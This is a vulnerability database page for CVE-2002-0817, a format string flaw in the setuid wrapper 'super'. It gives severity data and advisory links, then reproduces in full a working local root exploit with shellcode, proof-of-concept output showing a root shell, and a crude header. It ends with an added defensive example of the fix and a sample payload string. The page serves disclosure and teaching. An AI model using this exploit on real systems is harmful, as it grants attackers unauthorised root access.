CVE-2002-0817
CVSS 7.2
Published: 2002-08-12 00:00:00
Revised: 2016-10-17 22:22:06

[Original] Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument.


[CNNVD] William Deich Super SysLog Format String Vulnerability (CNNVD-200208-122)

super for Linux has a format string vulnerability. A local user can gain root privileges via an overly long command line argument.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can result in a complete system outage]
Attack complexity: LOW [no special access conditions required for exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CPE (affected platforms and products)

cpe:/a:william_deich:super:3.16
cpe:/a:william_deich:super:3.17
cpe:/a:william_deich:super:3.18
cpe:/a:william_deich:super:3.12

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0817
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0817
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-122
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0045.html
(UNKNOWN)  VULNWATCH  20020730 The SUPER Bug
http://marc.info/?l=bugtraq&m=102812622416695&w=2
(UNKNOWN)  BUGTRAQ  20020731 The SUPER Bug
http://www.debian.org/security/2002/dsa-139
(VENDOR_ADVISORY)  DEBIAN  DSA-139
http://www.iss.net/security_center/static/9741.php
(UNKNOWN)  XF  super-syslog-format-string(9741)
http://www.securityfocus.com/bid/5367
(UNKNOWN)  BID  5367

- Vulnerability information

William Deich Super SysLog Format String Vulnerability
High severity  Format string
2002-08-12 00:00:00 2005-05-02 00:00:00
Local
super for Linux has a format string vulnerability. A local user can gain root privileges via an overly long command line argument.

- Advisories and patches

FreeBSD has released a Security Notice FreeBSD-SN-02:05. Users of FreeBSD systems are strongly urged to upgrade their ports tree to fix various reported issues. Further information can be found in the referenced Security Notice.
Fixes available:
William Deich super 3.12
William Deich super 3.16
William Deich super 3.17
William Deich super 3.18

- Vulnerability information (21674)

William Deich Super 3.x SysLog Format String Vulnerability (EDBID:21674)
linux local
2002-07-31 Verified
0 gobbles
N/A
source: http://www.securityfocus.com/bid/5367/info

super is prone to a format string vulnerability. This problem is due to incorrect use of the syslog() function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. 

/*
 * SAVE DEFCON..HELP GOBBLES..SAVE DEFCON..HELP GOBBLES
 *
 * When GOBBLES say he and he security team
 * are non-profit. He really mean NON-profit.
 * This means GOBBLES and he GOBBLES Security
 * Labs (GSL) friends do not have much funds.
 *
 * GOBBLES was hoping to receive the money 
 * for speaking at the defcon gathering of
 * security enthusiasts up front. So he could buy 
 * and pay for he ticket to Las Vegas from the great city
 * of Baltimore where he currently resides.
 *
 * GOBBLES is not selling out.  GOBBLES is just admitting that he
 * need your help.  Please, help GOBBLES!
 *
 * After many e-mails to defcon organisers it became
 * apparent to GOBBLES this was not going to happen.
 * This mean GOBBLES has no way of getting to defcon.
 * This also mean GOBBLES cannot deliver he talk that
 * are named "Wolves among us". A lot of time and work
 * went into the preparation of this talk and it was
 * to be the grand finale of the year of the turkey
 * (2002). With many new 0-day to give out and many
 * great announcements to be made.
 *
 * Thanks to Jeff Moss (dt@defcon.org, jmoss@blackhat.com) 
 * you, the defcon attendee, may very well get cheated out 
 * of attending one of the most provocative and daring
 * events defcon history has ever seen. 
 *
 * 	!!! ITS NOT TOO LATE..BUT HURRY !!!
 * 
 * Help GOBBLES go to defcon. GOBBLES give so much to
 * the community..is it not time the community now help
 * a poverty stricken turkey to spread his wings and fly
 * towards fame and glory? 
 *
 * Reasons why you should help GOBBLES get to defcon:
 *  
 * -- Paying for GOBBLES plane ticket to Vegas is better than spending $300 on a stripper
 *
 * -- Seeing GOBBLES present naked: Priceless.
 * 
 * -- Zeroday (possible hardcover) GOBBLES comic
 *
 * -- A chance to buy GOBBLES art
 *
 * -- A chance to receive _free_ GOBBLES T-shirts
 * 
 * -- Copies of those exploits you couldn't code
 *
 *
 * What does GOBBLES need?
 *
 * Basically GOBBLES need to round up 300 US dollars before saturday.
 * "Wolves among us" is scheduled for the last day of defcon.
 * Namely 3PM on Sunday August 4th. As you can very well imagine
 * this talk was going to blow the lid off of more dirty secrets
 * than there are noodles in China. With your help GOBBLES can still 
 * make this happen. So what GOBBLES is asking for is a little helping
 * hand from the community. If anyone has the funds to sponsor GOBBLES
 * to come to defcon please contact GOBBBLES at GOBBLES@hushmail.com.
 *
 *     !!! TURKEY SUPPORTERS...DO NOT LET THE TURKEY BE SILENCED !!!
 *
 * GOBBLES accepts Western Union payments.  GOBBLES will not accept anything
 * beyond the amount needed for travel to Vegas and back.  GOBBLES is not 
 * selling out, GOBBLES is asking help from those penetrators and researchers
 * that GOBBLES helps every day.
 *
 * In other news, ISS rejected GOBBLES request for a job application.  It 
 * seems that they're afraid of getting scalp'd.
 *
 * 			     Political statement:
 * HALT THE SNOSOFT ABUSE OF 14 YEAR OLDS. MAKING CHILDREN SLAVE OVER 3 LINE
 * PERL EXPLOITS FOR LESS THAN MINIMUM WAGE IS NOT VERY ETHICAL !!!
 *
 * FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN FREE DVDMAN  
 * JAIL W00W00 JAIL W00W00 JAIL W000W0 JAIL W00W00 JAIL W00W00 JAIL W00W00
 * FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM FUCK ADM
 */

/*
 * GOBBLES-own-super.c 
 *  -- root exploit for root hole in root wrapper
 * 
 * Super is sudo wannabe that boasts much security.
 * GOBBLES think people who write setuid wrappers
 * should learn to program securely before opening
 * big hoohoo about how secure program is.
 *
 * Current super version (3.18):
 *   -- ftp://ftp.ucolick.org/pub/users/will/
 * 
 * Super maintainer say following about he code:
 *
 * "Super allows an admin to control access to files
 *  and functions for users. It is similar to sudo, but 
 *  uses a different approach in the configuration file."
 *
 * Problem:
 * 
 * When super is compiled to use syslog(3) for its logging
 * of error messages the following lines makes pre-auth
 * local root exploitation rather trivial:
 * 
 * From error.c 
 * ... 
 * #define SysLog(pri, buf) syslog((pri), (buf))
 * ...
 * SysLog(error_priority, buf);
 * ...
 *
 * This means users that are not in the super config file
 * will be able to execute code with root privileges.
 *
 * "Super acts as a SetUID wrapper around system commands
 *  to make sure the commands are executed safely, and
 *  only by authorized users."
 *
 * 		hehehe ;PPpPPPPp
 *
 * Love, 
 * GOBBLES
 * GOBBLES@hushmail.com
 * 
 * Official site: http://www.bugtraq.org
 * Official mirror: http://www.immunitysec.com/GOBBLES/
 */

/* Proof Of Concept:

$ gcc GOBBLES-own-super.c -o GOBBLES-own-super   
$ ./GOBBLES-own-super 

Usage: 
./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]

$ objdump -s -j .dtors /usr/local/bin/super

/usr/local/bin/super:     file format elf32-i386

Contents of section .dtors:
 8063f7c ffffffff 00000000                    ........        

$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx��%.49103x%29$hn%.16305x%30$hn'.
sh-2.05# 

*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>

#define ALLIGN		2 
#define DPA		29 	

#define SUPER		"/usr/local/bin/super"

void buildstring(unsigned long t, unsigned long w, int dpa, int allign);
void stuff(void);

extern char **environ;
char string[256];

int
main(int argc, char **argv)
{
	unsigned long t, w;
	int dpa, allign, shift = 0;
	char c, *store;	

	if(argc == 1) {
		fprintf(stderr, "\nUsage: \n%s -t <.dtors address> [ -o <offset> -A <allignment> ]\n", argv[0]);
		exit(0);
	}
	
	allign = ALLIGN;
	dpa = DPA;
	
	while((c = getopt(argc, argv, "t:o:A:")) != EOF) {
		switch(c) {
			case 't':
				sscanf(optarg, "%p", &store);
				t = (long)store;
			 	t += 4;
				break;
			case 'o':
				dpa = atoi(optarg);
				break;
			case 'A':
				allign = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehe ;PPppPPPp\n");
				exit(0);
		}
	}
	
	store = NULL;

	if((store = getenv("GOBBLES")) == NULL) {
		stuff();
		if(execve(argv[0], argv, environ)) {
			fprintf(stderr, ". problem re-executing\n");
			exit(1);
		}
	}
	
	w = (long)store;
	// shift is signed so this works both ways
	shift = (strlen(argv[0]) - strlen(SUPER));
	w += shift;
	
	fprintf(stderr, ". target @ %p\n. shellcode @ %p\n", t, w);
			
	buildstring(t, w, dpa, allign);
	
	if(execl(SUPER, "super", string, NULL)) {
		fprintf(stderr, "error executing\n");
		exit(1);
	}
}

void 
buildstring(unsigned long t, unsigned long w, int dpa, int allign)
{
	unsigned int un, deux, x, b[4], namelen;
	char a_buf[4];
	struct passwd *pass;	

	memset(string, '\0', sizeof(string));
	memset(a_buf, '\0', sizeof(a_buf));
	
	if((pass = getpwuid(getuid())) == NULL) {
		fprintf(stderr, ". can't find your username\n");
		exit(1);
	}
 
	namelen = strlen(pass->pw_name);

	fprintf(stderr, ". username: %d bytes\n", namelen);

	for(x = 0; x < allign && x < sizeof(a_buf); x++)
		a_buf[x] = 'x';

	b[0] = (t & 0x000000ff);
	b[1] = (t & 0x0000ff00) >> 8;
	b[2] = (t & 0x00ff0000) >> 16;
	b[3] = (t & 0xff000000) >> 24; 

	un = (w >> 16) & 0xffff;
	deux = w & 0xffff; 

	if(un < deux) {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c"  
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0] + 2, b[1], b[2], b[3], b[0], b[1], b[2], b[3],
                        un - (8 + allign + 29 + namelen), 
			dpa, deux - un, dpa + 1 
			
		);
        }
        else {
                snprintf(string, sizeof(string)-1, 
			"%s" 
			"%c%c%c%c%c%c%c%c" 
			"%%.%hdx" "%%%d$hn" 
			"%%.%hdx" "%%%d$hn",
                        a_buf, 
			b[0], b[1], b[2], b[3], b[0] + 2, b[1], b[2], b[3],
                        deux - (8 + allign + 29 + namelen), 
			dpa, un-deux, dpa + 1
			
		);
        }
}

void  
stuff(void)
{
        char code[] = // the setuid 0 with the execve of the /bin/sh
	"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
	"\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
	"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
	"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
	setenv("GOBBLES", code, 1);
}
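
The defect that both the BID description above and the exploit header's "Problem" section point at is the `SysLog(pri, buf)` macro in super's error.c: an already formatted message, which embeds the user's command-line argument, is handed to syslog(3) as the format argument, so `%` sequences in the argument are interpreted. The following is an added example written for this page (it is neither super's code nor the exploit author's) that shows the vulnerable shape next to the corrected one, a printf-style wrapper whose variable part can never become a format, and a check that the corrected path keeps `%` sequences literal. `LOG_BUF_SIZE`, `format_error_message`, `log_error` and `message_preserves_input` are names chosen for this example; the error message text mirrors the one in the proof-of-concept output above.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#include <syslog.h>

/* Buffer size chosen for this example; not super's own value. */
#define LOG_BUF_SIZE 256

/* Vulnerable shape (quoted from super's error.c on this page): the message
 * buffer, which already contains the user's argument, is the FORMAT argument,
 * so any "%..." inside it is parsed by syslog():
 *
 *   #define SysLog(pri, buf) syslog((pri), (buf))
 *
 * Corrected shape: the message is always a conversion ARGUMENT of a constant
 * "%s" format, so its bytes are copied verbatim and never treated as directives. */
#define SafeSysLog(pri, buf) syslog((pri), "%s", (buf))

/* Build the error text the way a fixed logging path should: the user-controlled
 * command name is an argument to a constant format. Returns what snprintf
 * wanted to write (excluding the NUL) so callers can notice truncation. */
int format_error_message(char *out, size_t n, const char *cmdname)
{
    return snprintf(out, n, "No such super command as `%s'.", cmdname);
}

/* printf-style wrapper with a compiler-checked constant format (GCC/clang
 * 'format' attribute). Callers pass the variable text as arguments, and the
 * rendered result goes to syslog through the constant "%s" above. */
__attribute__((format(printf, 2, 3)))
void log_error(int pri, const char *fmt, ...)
{
    char buf[LOG_BUF_SIZE];
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(buf, sizeof buf, fmt, ap);
    va_end(ap);
    SafeSysLog(pri, buf);
}

/* Returns 1 when the rendered message still contains the input verbatim,
 * i.e. none of its '%' sequences was consumed as a conversion. */
int message_preserves_input(const char *cmdname)
{
    char buf[LOG_BUF_SIZE];

    format_error_message(buf, sizeof buf, cmdname);
    return strstr(buf, cmdname) != NULL;
}

int main(void)
{
    /* Constructed sample input shaped like the payload in the PoC output. */
    const char *hostile = "xx%.49103x%29$hn";
    char buf[LOG_BUF_SIZE];

    format_error_message(buf, sizeof buf, hostile);
    printf("%s\n", buf); /* the directives appear literally; nothing is written through %n */
    log_error(LOG_ERR, "No such super command as `%s'.", hostile);
    return 0;
}
```

Building the original macro with `gcc -Wformat -Wformat-security` reports the non-literal format used with no arguments, which is the cheapest check to add to the build of any setuid program; the fixed macro and the attributed wrapper compile cleanly under the same flags.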

		

- Vulnerability information

5075
Linux Super Format String Elevated Privileges
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-04-09 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
